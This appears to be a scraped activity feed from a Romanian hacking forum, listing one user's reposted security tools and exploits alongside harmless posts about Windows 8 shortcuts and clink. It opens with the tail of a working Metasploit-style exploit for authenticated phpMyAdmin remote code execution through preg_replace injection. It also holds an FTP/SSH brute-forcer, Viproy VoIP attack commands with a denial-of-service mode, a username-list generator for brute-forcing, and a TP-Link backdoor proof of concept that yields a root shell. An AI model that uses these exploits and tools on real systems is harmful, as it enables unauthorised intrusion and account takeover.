$1.starts_with? '3.5.' return CheckCode::Vulnerable end return CheckCode::Unknown end end end def exploit uri = target_uri.path print_status("Grabbing CSRF token...") response = send_request_cgi({ 'uri' => uri}) if response.nil? fail_with(Exploit::Failure::NotFound, "Failed to retrieve webpage.") end if (response.body !~ /"token"\s*value="([^"]*)"/) fail_with(Exploit::Failure::NotFound, "Couldn't find token. Is URI set correctly?") else print_good("Retrieved token") end token = $1 post = { 'token' => token, 'pma_username' => datastore['USERNAME'], 'pma_password' => datastore['PASSWORD'] } print_status("Authenticating...") login = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'index.php'), 'vars_post' => post }) if login.nil? fail_with(Exploit::Failure::NotFound, "Failed to retrieve webpage.") end token = login.headers['Location'].scan(/token=(.*)[&|$]/).flatten.first cookies = login.get_cookies login_check = send_request_cgi({ 'uri' => normalize_uri(uri, 'index.php'), 'vars_get' => { 'token' => token }, 'cookie' => cookies }) if login_check.body =~ /Welcome to/ fail_with(Exploit::Failure::NoAccess, "Authentication failed.") else print_good("Authentication successful") end db = rand_text_alpha(3+rand(3)) exploit_result = send_request_cgi({ 'uri' => normalize_uri(uri, 'db_structure.php'), 'method' => 'POST', 'cookie' => cookies, 'vars_post' => { 'query_type' => 'replace_prefix_tbl', 'db' => db, 'selected[0]' => db, 'token' => token, 'from_prefix' => "/e\0", 'to_prefix' => payload.encoded, 'mult_btn' => 'Yes' } },1) end end Source: phpMyAdmin Authenticated Remote Code Execution ? Packet Storm
  11. Fi8sVrs
    This is some Short cut from windows 8 check it out : Windows key: Switch between Modern Desktop Start screen and the last accessed application Windows key + C: Access the charms bar Windows key + Tab: Access the Modern Desktop Taskbar Windows key + I: Access the Settings charm Windows key + H: Access the Share charm Windows key + K: Access the Devices charm Windows key + Q: Access the Apps Search screen Windows key + F: Access the Files Search screen Windows key + W: Access the Settings Search screen Windows key + P: Access the Second Screen bar Windows key + Z: Brings up the App Bar when you have a Modern Desktop App running Windows key + X: Access the Windows Tools Menu Windows key + O: Lock screen orientation Windows key + . : Move the screen split to the right Windows key + Shift + . : Move the screen split to the left Windows key + V: View all active Toasts/Notifications Windows key + Shift + V: View all active Toasts/Notifications in reverse order Windows key + PrtScn: Takes a screenshot of the screen and automatically saves it in the Pictures folder as Screenshot Windows key + Enter: Launch Narrator Windows key + E: Open Computer Windows key + R: Open the Run dialog box Windows key + U: Open Ease of Access Center Windows key + Ctrl + F: Open Find Computers dialog box Windows key + Pause/Break: Open the System page Windows key + 1..10: Launch a program pinned on the Taskbar in the position indicated by the number Windows key + Shift + 1..10: Launch a new instance of a program pinned on the Taskbar in the position indicated by the number Windows key + Ctrl + 1..10: Access the last active instance of a program pinned on the Taskbar in the position indicated by the number Windows key + Alt + 1..10: Access the Jump List of a program pinned on the Taskbar in the position indicated by the number Windows key + B: Select the first item in the Notification Area and then use the arrow keys to cycle through the items Press Enter to open the selected item Windows key + Ctrl + B: Access the program that is displaying a message in the Notification Area Windows key + T: Cycle through the items on the Taskbar Windows key + M: Minimize all windows Windows key + Shift + M: Restore all minimized windows Windows key + D: Show/Hide Desktop (minimize/restore all windows) Windows key + L: Lock computer Windows key + Up Arrow: Maximize current window Windows key + Down Arrow: Minimize/restore current window Windows key + Home: Minimize all but the current window Windows key + Left Arrow: Tile window on the left side of the screen Windows key + Right Arrow: Tile window on the right side of the screen Windows key + Shift + Up Arrow: Extend current window from the top to the bottom of the screen Windows key + Shift + Left/Right Arrow: Move the current window from one monitor to the next Windows key + F1: Launch Windows Help and Support PageUp: Scroll forward on the Modern Desktop Start screen PageDown: Scroll backward on the Modern Desktop Start screen Esc: Close a charm Ctrl + Esc: Switch between Modern Desktop Start screen and the last accessed application Ctrl + Mouse scroll wheel: Activate the Semantic Zoom on the Modern Desktop screen Alt: Display a hidden Menu Bar Alt + D: Select the Address Bar Alt + P: Display the Preview Pane in Windows Explorer Alt + Tab: Cycle forward through open windows Alt + Shift + Tab: Cycle backward through open windows Alt + F: Close the current window Open the Shut Down Windows dialog box from the Desktop Alt + Spacebar: Access the Shortcut menu for current window Alt + Esc: Cycle between open programs in the order that they were opened Alt + Enter: Open the Properties dialog box of the selected item Alt + PrtScn: Take a screen shot of the active Window and place it in the clipboard Alt + Up Arrow: Move up one folder level in Windows Explorer (Like the Up Arrow in XP) Alt + Left Arrow: Display the previous folder Alt + Right Arrow: Display the next folder Shift + Insert: CD/DVD Load CD/DVD without triggering Autoplay or Autorun Shift + Delete: Permanently delete the item (rather than sending it to the Recycle Bin) Shift + F6: Cycle backward through elements in a window or dialog box Shift + F10: Access the context menu for the selected item Shift + Tab: Cycle backward through elements in a window or dialog box Shift + Click: Select a consecutive group of items Shift + Click on a Taskbar button: Launch a new instance of a program Shift + Right-click on a Taskbar button: Access the context menu for the selected item Ctrl + A: Select all items Ctrl + C: Copy the selected item Ctrl + X: Cut the selected item Ctrl + V: Paste the selected item Ctrl + D: Delete selected item Ctrl + Z: Undo an action Ctrl + Y: Redo an action Ctrl + N: Open a new window in Windows Explorer Ctrl + W: Close current window in Windows Explorer Ctrl + E: Select the Search box in the upper right corner of a window Ctrl + Shift + N: Create new folder Ctrl + Shift + Esc: Open the Windows Task Manager Ctrl + Alt + Tab: Use arrow keys to cycle through open windows Ctrl + Alt + Delete: Access the Windows Security screen Ctrl + Click: Select multiple individual items Ctrl + Click and drag an item: Copies that item in the same folder Ctrl + Shift + Click and drag an item: Creates a shortcut for that item in the same folder Ctrl + Tab: Move forward through tabs Ctrl + Shift + Tab: Move backward through tabs Ctrl + Shift + Click on a Taskbar button: Launch a new instance of a program as an Administrator Ctrl + Click on a grouped Taskbar button: Cycle through the instances of a program in the group F1: Display Help F2: Rename a file F3: Open Search F4: Display the Address Bar list F5: Refresh display F6: Cycle forward through elements in a window or dialog box F7: Display command history in a Command Prompt F10: Display hidden Menu Bar F11: Toggle full screen display Tab: Cycle forward through elements in a window or dialog box PrtScn: Take a screen shot of the entire screen and place it in the clipboard Home: Move to the top of the active window End: Move to the bottom of the active window Delete: Delete the selected item Backspace: Display the previous folder in Windows Explorer Move up one folder level in Open or Save dialog box Esc: Close a dialog box Num Lock Enabled + Plus (+): Display the contents of the selected folder Num Lock Enabled + Minus (-): Collapse the selected folder Num Lock Enabled + Asterisk : Expand all subfolders under the selected folder Press Shift 5 times Turn StickyKeys on or off Hold down right Shift for 8 seconds Turn FilterKeys on or off Hold down Num Lock for 5 seconds Turn ToggleKeys on or off
  12. Fi8sVrs
    ssh2ftpcrack is a simple FTP and SSH dictionary brute force cracking tool written in Perl. Author: GhOsT-PR #puerto.ghost.rico@gmail.com README: Steps: 1) Install libssh2( http://www.libssh2.org/ ) before installing Net::SSH2 2) Before installing Net::SSH2, install YAML 3) Type at the konsole as root: cpan YAML && cpan Net::SSH2 Now you are ready to use ssh2ftpcrack Usage: ssh2ftpcrack.pl [ftp or ssh] [user] [host] [wordlist] Download SSH2FTPCrack FTP / SSH Brute Forcer 0.2 ? Packet Storm
  13. Fi8sVrs
    metoda asemanatoare este postata la V.i.P
  14. Fi8sVrs
    Instant Penetration Testing: Setting Up a Test Lab How-to [instant] | Packt Publishing se poate ?
  15. Fi8sVrs
    Sanewall making sense of firewalling Project information Sanewall is a firewall builder for Linux which uses an elegant language abstracted to just the right level. This makes it powerful as well as easy to use, audit, and understand. It allows you to create very readable configurations even for complex stateful firewalls. Sanewall can be used for almost any firewall need, including: control of any number of internal/external/virtual interfaces control of any combination of routed traffic setting up DMZ routers and servers all kinds of NAT providing strong protection (flooding, spoofing, etc.) transparent caches source MAC verification blacklists, whitelists The current experimental snapshots support IPv6. Sanewall abstracts the differences between IPv4 and IPv6, allowing you to define a common set of rules for both whilst permitting specific rules for each as you need. Sanewall is a fork of FireHOL. The configuration language is identical, just see this FAQ for some variable name changes. For now the FireHOL website is still the best source of introductory information. Sanewall is released under the GPLv2+ open source licence. Downloads Latest Release All Releases Daily Snapshots Git Repositories Source: Sanewall - Home
  16. Fi8sVrs
    emkei.cz trimite in spam
  17. Fi8sVrs

    clink

    Fi8sVrs posted a topic in Programe utile

    Bringing Bash's powerful command line editing to Microsoft Windows' cmd.exe Introduction Clink enhances your productivity in Microsoft Windows' "cmd.exe". If you're familiar with Bash then you will be familiar with the changes that clink brings to "cmd.exe" (it uses the same 'Readline' library that Bash uses). It is a small utility to enhance "cmd.exe", adding more powerful command line completion, editing, and history. Features Powerful Bash-like line editing from GNU's Readline library. Read more on Readline's keyboard shortcuts. Superior path completion (TAB). Paste from clipboard (Ctrl-V). Support for the completion of executables/commands, and environment variables. Undo/Redo (Ctrl-_ or Ctrl-X, Ctrl-U) Improved command line history. Persists across sessions. Searchable (Ctrl-R and Ctrl-S). History expansion (e.g. !!, !<string>, and !$). [*] Scriptable completion using Lua. Usage There are a variety of ways to start clink; If you installed the auto-run, start "cmd.exe" as per usual. To manually start, run the clink shortcut from the Start menu (or the clink.bat located in the install directory). To deploy clink to an existing cmd.exe process, use "<install_dir>\clink.exe inject" clink has been tested on Windows XP SP3 and upwards. Visual C++ Redistributable requirement clink requires that the Microsoft's Visual C++ 2010 Redistributable be install on your system. If you need to install them they can be found here; 32-bit (x86); Download Microsoft Visual C++ 2010 Redistributable Package (x86) from Official Microsoft Download Center 64-bit (x64); Download Microsoft Visual C++ 2010 Redistributable Package (x64) from Official Microsoft Download Center Writing completion scripts with Lua It is easy to customise completion in clink with simple Lua scripts. It is a matter of writing a match generator function and registering the function with clink. When called the generator function adds matches to clink - if appropriate. A very basic example script gives the best overview of what is involved; -- Globals; -- rl_line_buffer : The current command line. -- rl_point : Current location of the cursor. function example_match_generator(text, first, last) -- Arguments; -- text : The word being completed, as tokenised by Readline. -- first : The index into rl_line_buffer where 'text' starts. -- last : Index into rl_line_buffer where 'text' ends. -- Returns; -- true : No further generator functions should be called. -- false : Generator has done nothing. Try the next generator. -- In this simple example generate a match when the user types -- the following; my_ma<TAB> if not rl_line_buffer == "my_ma" then return false end clink.add_match("my_match") return true end -- clink.register_match_generator(<function>, <priority>) clink.register_match_generator(example_match_generator, 50) Further examples can be found in clink's install directory. User's Lua scripts go in %ALLUSERSPROFILE%\clink\ (which is usually C:\ProgramData\clink\) and clink loads the .lua files it finds there. The keyboard shortcut Ctrl-Q will force clink to reload the Lua scripts - useful when writing your own scripts. Changing match display colour Create a new Lua script in %ALLUSERSPROFILE%\clink\ Add the following line (where X is a number in the range 0-15); clink.setpalette(X) For values for X run "color /?" on a command prompt. Building clink Download Premake from here; Premake | Industrious One There is a bug in Premake 4.3 that generates corrupt .vcxproj files. Please use 4.4 (or newer). [*] Run "premake <toolchain>" in the root of clink's source tree. Where "<toolchain>" is one of Premake's actions (see "premake --help") clink has been tested with vs2010, gmake (with mingw32), and vs2008. [*] Build scripts will be generated in ".build\<toolchain>\". For example; .build\vs2010\clink.sln. Builds Builds from the git repository can be found here; https://www.dropbox.com/sh/r9oqmn2mqfp3okp/Jm_F3pJSNI Downloads Source: https://code.google.com/p/clink/
  18. Fi8sVrs
    Viproy - VoIP Penetration Testing Kit Project Page : http://www.github.com/fozavci/viproy-voipkit Download : https://github.com/fozavci/viproy-voipkit/archive/master.zip Viproy Voip Pen-Test Kit is developed to improve quality of SIP Penetration Tests. It provides authentication feature that helps to create simple tests. It includes 7 different modules with authentication support: options tester, brute forcer, enumerator, invite tester, trust analyzer, proxy and registration tester. All attacks could perform before and after authentication to fuzz SIP services and value added services. SIP Pen-test guide will be published soon. Basic Usage of Modules are presented below, it can be used before guide. All modules have DEBUG and VERBOSE supports Preparing Test Network VulnVOIP is vulnerable SIP server, you can use it for tests VulnVOIP : VulnVoIP Archives - Rebootuser Installation Copy "lib" and "modules" folders' content to Metasploit Root Directory. Mixins.rb File (lib/msf/core/auxiliary/mixins.rb) Should Contain This Line require 'msf/core/auxiliary/sip' Videos & Papers Attacking SIP/VoIP Servers Using VIPROY VoIP Pen-Test Kit for Fun & Profit - Video (50 mins) This is a training video for penetration testing of SIP servers. Chapters of Training Video 1-Footprinting of SIP Services 2-Enumerating SIP Services 3-Registering SIP Service with/without Credentials 4-Brute Force Attack for SIP Service 5-Call Initiation with/without Spoof & Credentials 6-Hacking Trust Relationships 7-Intercepting SIP Client with SIP Proxy Viproy - VoIP Penetration Testing Kit Project Page : http://www.github.com/fozavci/viproy-voipkit Download : https://github.com/fozavci/viproy-voipkit/archive/master.zip Viproy Voip Pen-Test Kit is developed to improve quality of SIP Penetration Tests. It provides authentication feature that helps to create simple tests. It includes 7 different modules with authentication support: options tester, brute forcer, enumerator, invite tester, trust analyzer, proxy and registration tester. All attacks could perform before and after authentication to fuzz SIP services and value added services. SIP Pen-test guide will be published soon. Basic Usage of Modules are presented below, it can be used before guide. All modules have DEBUG and VERBOSE supports Preparing Test Network VulnVOIP is vulnerable SIP server, you can use it for tests VulnVOIP : VulnVoIP Archives - Rebootuser Installation Copy "lib" and "modules" folders' content to Metasploit Root Directory. Mixins.rb File (lib/msf/core/auxiliary/mixins.rb) Should Contain This Line require 'msf/core/auxiliary/sip' Videos & Papers Attacking SIP/VoIP Servers Using VIPROY VoIP Pen-Test Kit for Fun & Profit - Video (50 mins) This is a training video for penetration testing of SIP servers. Chapters of Training Video 1-Footprinting of SIP Services 2-Enumerating SIP Services 3-Registering SIP Service with/without Credentials 4-Brute Force Attack for SIP Service 5-Call Initiation with/without Spoof & Credentials 6-Hacking Trust Relationships 7-Intercepting SIP Client with SIP Proxy Sample Usage Video Hacking Trust Relationships of SIP/NGN Gateways - Video Hacking Trust Relationships Between SIP Gateways (PDF) http://viproy.com/files/siptrust.pdf Usage Global Settings setg CHOST 192.168.1.99 #Local Host setg CPORT 5099 #Local Port setg RHOSTS 192.168.1.1-254 #Target Network setg RHOST 192.168.1.201 #Target Host Basic Usage of OPTIONS Module use auxiliary/scanner/sip/vsipoptions show options set THREADS 255 run Basic Usage of REGISTER Module use auxiliary/scanner/sip/vsipregister show options run set LOGIN true set USERNAME 101 set PASSWORD s3cur3 run Basic Usage of INVITE Module use auxiliary/scanner/sip/vsipinvite set FROM 2000 set TO 1000 run set LOGIN true set FROM 102 set USERNAME 102 set PASSWORD letmein123 run set DOS_MODE true set NUMERIC_USERS true set NUMERIC_MIN 200 set NUMERIC_MAX 205 run Basic Usage of ENUMERATOR Module use auxiliary/scanner/sip/vsipenumerator show options unset USERNAME set USER_FILE /tmp/files/users2 set VERBOSE false set METHOD SUBSCRIBE run unset USER_FILE set METHOD SUBSCRIBE set NUMERIC_USERS true set NUMERIC_MAX 2300 run set METHOD REGISTER run Basic Usage of BRUTE FORCE Module use auxiliary/scanner/sip/vsipbruteforce show options set RHOST 192.168.1.201 set USERNAME 2000 set PASS_FILE /tmp/files/passwords set VERBOSE false run unset USERNAME set USER_FILE /tmp/files/users2 run unset USER_FILE set NUMERIC_USERS true set NUMERIC_MAX 500 run Basic Usage of Trust Analyzer Module use auxiliary/scanner/sip/vsiptrust show options set SRC_RHOSTS 192.168.1.200-210 set SRC_RPORTS 5060 set SIP_SERVER 192.168.1.201 set INTERFACE eth0 set TO 101 run show options set ACTION CALL set SRC_RHOSTS 192.168.1.202 set FROM James Bond run Basic Usage of SIP Proxy Module use auxiliary/scanner/sip/vsipproxy show options set PRXCLT_PORT 5060 set PRXCLT_IP 192.168.1.99 set PRXSRV_PORT 5089 set PRXSRV_IP 192.168.1.99 set CLIENT_IP 192.168.1.120 set CLIENT_PORT 5060 set SERVER_IP 192.168.1.201 set SERVER_PORT 5060 set CONF_FILE /tmp/sipproxy_replace.txt set LOG true set VERBOSE false run Source Viproy - Tools
  19. Fi8sVrs
    ai Fun Stuff pentru asta daca ti se pare amuzant; hahahaha
  20. Fi8sVrs
    Bine ai revenit!
  21. Fi8sVrs
    usernamer is a penetration testing tool to generate a list of possible usernames/logins for determined name (ex: John Doe Doeson) for user enumeration or bruteforcing. This tool also supports text-files with one name per line as input. Features usernamer has a plugin structure that enables a series of transformations: normal: Permutates given name with all surnames (if more than one) with name starting and ending (johndoedoeson,johndoesondoe,doedoesonjohn etc) two_terms: Permutates given name with all surnames (if more than one) with name starting and ending but it will output a two-termed login (johndoe, doejohn, johndoeson etc) one_term: Permutates all name tokens (first name and surnames) and generates single terms usernames (john, doe, doeson) dotted_two_terms: Permutates given name with all surnames (if more than one) with name starting and ending but it will output a two-termed login dot-separated (john.doe, doe.john, john.doeson etc) normal_abbreviated: Generates abbreviated versions of the ‘normal’ and ‘two_terms’ plugins (jdoe, johnd, jd etc) Usage: usage: usernamer.py [ -f <file> ] [ -n <full name> ] [ -l ] flags: -n supplies a single name -f supplies name entries from text file -l converts result to lowercase -p manually specify plugins (comma-separated) [default: all] ['normal', 'two_terms', 'one_term', 'normal_abbreviated', 'dotted_two_terms'] usernamer.py #!/usr/bin/env python""" $Id: $ Copyright © 2012-2013 Jan Seidl <jseidl@wroot.org> (http://wroot.org/) LICENSE: This software is distributed under the GNU General Public License version 3 (GPLv3) LEGAL NOTICE: THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL USE ONLY! IF YOU ENGAGE IN ANY ILLEGAL ACTIVITY THE AUTHOR DOES NOT TAKE ANY RESPONSIBILITY FOR IT. BY USING THIS SOFTWARE YOU AGREE WITH THESE TERMS. """ import getopt, sys import string #### # Program info #### USERNAMER_VERSION="1.0-rc1" BUILD_DATE="2012-03-15" AVAILABLE_PLUGINS=[ 'normal', 'two_terms', 'one_term', 'normal_abbreviated', 'dotted_two_terms' ] AVAILABLE_FILTERS=[ 'sort', 'unique' ] #### # Program Functions #### def parse_file(filePath, plugins = [], filters = []): try: with open(filePath, 'r') as fileObject: for line in fileObject: parse_name(line, plugins, filters) except IOError: e = "Could not open the file: " + filePath error(e) def parse_name(name, plugins = [], filters = []): name = name.strip() # Trim whitespaces nameTokens = name.split(' ') # Tokenize name and each surname numTokens = len(nameTokens) if numTokens < 2: error('Name and at least one Surname must be supplied') # Split First Name and Surnames firstName = nameTokens[0] nameTokens.pop(0) surnames = nameTokens results = [] # Run Plugins run_plugins(firstName, surnames, results, plugins) # Run Filters run_filters(results, filters) for result in results: print result def run_plugins(firstName, surnames, resultList, plugins = []): defaultPlugins = AVAILABLE_PLUGINS if len(plugins) == 0: plugins = defaultPlugins for pluginName in plugins: internalPluginName = "plugin_"+pluginName # Validate if plugin exists if not internalPluginName in globals(): error("Invalid plugin: "+pluginName) pluginObject = globals()[internalPluginName] pluginObject(firstName, surnames, resultList) def run_filters(resultList, filters = []): defaultFilters = AVAILABLE_FILTERS if len(filters) == 0: filters = defaultFilters for filterName in filters: internalFilterName = "filter_"+filterName # Validate if filter exists if not internalFilterName in globals(): error("Invalid plugin: "+filterName) filterObject = globals()[internalFilterName] filterObject(resultList) #### # Result Filters #### # Unique Filter # # Removes duplicated entries def filter_unique(resultList): uniqueResults = set(resultList) del resultList[:] for result in uniqueResults: resultList.append(result) # Sort Filter # # Filter entries alphabetically def filter_sort(resultList): resultList.sort() # Lowercase Filter # # Transforms entries to lowercase def filter_lowercase(resultList): for key, result in enumerate(resultList): resultList[key] = result.lower() #### # Parsing Plugins #### # Normal Plugin # # Generates usernames based on concatenation # of first name with surnames in permutation # # Ex: JohnPaulJones, JohnJonesPaul def plugin_normal(firstName, surnames, resultList): surnamePermutations = permutate_all(surnames) for permutations in surnamePermutations: resultList.append(firstName+string.join(permutations, '')) resultList.append(string.join(permutations, '')+firstName) # Two Terms Plugin # # Generates usernames based on concatenation # of first name with surnames in permutation # # Ex: JohnPaul, JohnJones, PaulJones def plugin_two_terms(firstName, surnames, resultList): # Try each surname with # first name and reversed for surname in surnames: resultList.append(firstName+surname) resultList.append(surname+firstName) # If more than one surname, # combine'em too if len(surnames) > 1: tokens = list(surnames) for surname in surnames: firstToken = tokens.pop(0) for token in tokens: resultList.append(firstToken+token) # One Term Plugin # # Generates usernames based on permutation # of first name and surnames generating one-word # usernames # # Ex: John, Paul, Jones def plugin_one_term(firstName, surnames, resultList): tokens = [ firstName ] tokens += surnames for name in tokens: resultList.append(name) # Dotted Two Terms Plugin # # Generates usernames based on concatenation # of first name with surnames in permutation # with a dot in the middle # # Ex: John.Paul, John.Jones, Paul.Jones def plugin_dotted_two_terms(firstName, surnames, resultList): # Try each surname with # first name and reversed for surname in surnames: resultList.append(firstName+'.'+surname) resultList.append(surname+'.'+firstName) # Normal Abbreviated Plugin # # Generates usernames based on concatenation # of first name with surnames in permutation # in abbreviated forms # # Ex: JohnPJones, JohnPaulJ, JohnJonesP JohnJPaul def plugin_normal_abbreviated(firstName, surnames, resultList): permutatedSurnames = permutate_all(surnames) firstNameArr = [ firstName ] # All Terms for entry in permutatedSurnames: nameFirst = list(firstNameArr+entry) nameLast = list(entry+firstNameArr) for name in abbreviate(nameFirst): resultList.append(name) for name in abbreviate(nameLast): resultList.append(name) # Two Words for surname in surnames: for name in abbreviate([ firstName, surname ]): resultList.append(name) for name in abbreviate([ surname, firstName]): resultList.append(name) #### # Util functions #### def permutate_all(tokens): if len(tokens) <=1: yield tokens else: for perm in permutate_all(tokens[1:]): for i in range(len(perm)+1): yield perm[:i] + tokens[0:1] + perm[i:] def abbreviate(tokens): resultList = [] tokenCount = len(tokens) # One abbreviated word for i in range(tokenCount): output = '' position = 0 for j in tokens: if i == position: output += j[0] else: output += j position += 1; resultList.append(output) # Two abbreviated words for i in range(tokenCount): output = '' position = 0 for j in tokens: if i == position or i == position+1: output += j[0] else: output += j position += 1; resultList.append(output) # All-but-one abbreviated words if tokenCount > 3: for i in range(tokenCount): output = '' position = 0 for j in tokens: if i == position: output += j else: output += j[0] position += 1; resultList.append(output) return resultList #### # Main #### def main(): try: opts, args = getopt.getopt(sys.argv[1:], "hlp:f:n:", ["help", "lowercase", "plugins", "file=,"name=]) inputFile = None inputName = None defaultPlugins = AVAILABLE_PLUGINS defaultFilters = AVAILABLE_FILTERS for o, a in opts: if o in ("-h", "--help"): usage() sys.exit() elif o in ("-f", "--file"): inputFile = a elif o in ("-p", "--plugins"): pluginList = str(a).split(',') validPlugins = [] for plugin in pluginList: try: pluginIndex = AVAILABLE_PLUGINS.index(plugin) # check plugin existance validPlugins.append(plugin) except ValueError: error('Invalid plugin: "'+plugin+'"') defaultPlugins = validPlugins elif o in ("-n", "--name"): inputName = a elif o in ("-l", "--lowercase"): defaultFilters.append('lowercase') else: error("option '"+o+"' doesn't exists") if inputFile == None and inputName == None: error('Please specify an input file or name') if inputFile != None and inputName != None: error('Please specify only an input file or name, not both') # If name was supplied, # process single entry and exit if inputName: parse_name(inputName, plugins = defaultPlugins, filters = defaultFilters) sys.exit(0) # If file was supplied, # process each line if inputFile: parse_file(inputFile, plugins = defaultPlugins, filters = defaultFilters) sys.exit(0) except getopt.GetoptError, err: # print help information and exit: sys.stderr.write(str(err)) usage() sys.exit(2) def usage(): print print "usage: " + sys.argv[0] + " [ -f <file> ] [ -n <full name> ] [ -l ]"; print print "flags:" print "\t-n\tsupplies a single name" print "\t-f\tsupplies name entries from text file" print "\t-l\tconverts result to lowercase" print "\t-p\tmanually specify plugins (comma-separated) [default: all]" print "\t\t"+str(AVAILABLE_PLUGINS) print "" def error(errorMsg, fatal=True, showUsage=True): sys.stderr.write(errorMsg+"\n") if showUsage: usage() if fatal: sys.exit(2) if __name__ == "__main__": main() Download Download the latest version of usernamer directly from the github project page. Source
  22. Fi8sVrs

    Logs

    Fi8sVrs replied to R0cc0's topic in Off-topic

    sunt vechi Details on BAU : Luci : Thu 10/27/2011
  23. Fi8sVrs
    About the TP-Link Router TP-Link TL-WDR4300 is a popular dual band WiFi, SOHO class router. Tested Firmware We tested the remote root PoC on the newest firmware (published on 25.12.2012): TL-WDR4300 – tested firmware version The following info is provided for educational use only! We are also not resposible for any potential damages of the devices which are tested for this vulnerability. Proof of Concept root@secu:~# nc 192.168.0.1 2222 (UNKNOWN) [192.168.0.1] 2222 (?) : Connection refused root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html --2013-03-09 23:22:31-- http://192.168.0.1/userRpmNatDebugRpm26525557/start_art .html Connecting to 192.168.0.1:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] Saving to: "start_art.html" [ <=> ] 426 --.-K/s in 0s 2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426] root@secu:~# nc 192.168.0.1 2222 ps PID Uid VmSize Stat Command 1 root 404 S init 2 root SW< [kthreadd] 3 root SW< [ksoftirqd/0] 4 root SW< [events/0] 5 root SW< [khelper] 6 root SW< [async/mgr] 7 root SW< [kblockd/0] 8 root SW [pdflush] 9 root SW [pdflush] 10 root SW< [kswapd0] 17 root SW< [mtdblockd] 18 root SW< [unlzma/0] 71 root 2768 S /usr/bin/httpd 76 root 380 S /sbin/getty ttyS0 115200 78 root 208 S ipcserver 82 root 2768 S /usr/bin/httpd 83 root 2768 S /usr/bin/httpd 86 root 732 S ushare -d -x -f /tmp/ushare.conf 92 root 348 S syslogd -C -l 7 96 root 292 S klogd 101 root SW< [napt_ct_scan] 246 root 348 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u 247 root 204 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u 251 root 364 S /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf 286 root 2768 S /usr/bin/httpd 299 root 2768 S /usr/bin/httpd 300 root 2768 S /usr/bin/httpd 305 root 2768 S /usr/bin/httpd 307 root 2768 S /usr/bin/httpd 309 root 2768 S /usr/bin/httpd 310 root 2768 S /usr/bin/httpd 389 root 2768 S /usr/bin/httpd Details After the following HTTP request is sent: http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html the router downloads a file (nart.out) from the host which has issed the http request and executes is as root: PoC – diagram Sample captures from the host which issues the http request: Wireshark filter used to show router tftp traffic nart.out tftp request Models affected TL-WDR4300 TL-WR743ND (v1.2 v2.0) … History of the bug 12.02.2013 – TP-Link e-mailed with details – no response 22.02.2013 – TP-Link again e-mailed with details – no response 12.03.2013 – public disclosure More information More information about TP-Link backdoor Source TP-Link http/tftp backdoor
  24. Fi8sVrs
    Description SQLSentinel is an opensource tool that automates the process of finding the sql injection on a website. SQLSentinel includes a spider web and sql errors finder. You give in input a site and SQLSentinel crawls and try to exploit parameters validation error for you. When job is finished, it can generate a pdf report which contains the url vuln found and the url crawled. Features Support for MySQL, PostgreSQL, Microsoft SQL Server and Oracle(BETA) sql injection techniques: union, error based and blind query(and XML Error Based for Oracle also) Automatic random user-agents for the spider and sql crawler connections Cookie module for crawling and checking sites that are login required HTTP Proxy Support Built-in crawler bot Download SQLSentinel - OpenSource tool for sql injection security testing
  25. Fi8sVrs
    Convert your email address into a short, cute and safe link you can share on the web, in Twitter, forums, Craigslist, anywhere Use scr.im to get less spam Leaving your email as plain text in forums, on Twitter or on classified sites makes you an easy spam target: spam robots and email harvesters constantly browse these sites to collect new victim emails. Don't share your email on public sites. Instead, use our free service that will convert your email address (joe@email.com) into a safe and short URL (for instance http://scr.im/joe). People willing to email you will go to this URL that will reveal your email address, after a simple test that automated scripts and bots cannot pass. Don't share your email. Don't make yourself an easy spam target. Instead, share your safe scr.im URL scr.im - email protect
×
×
  • Create New...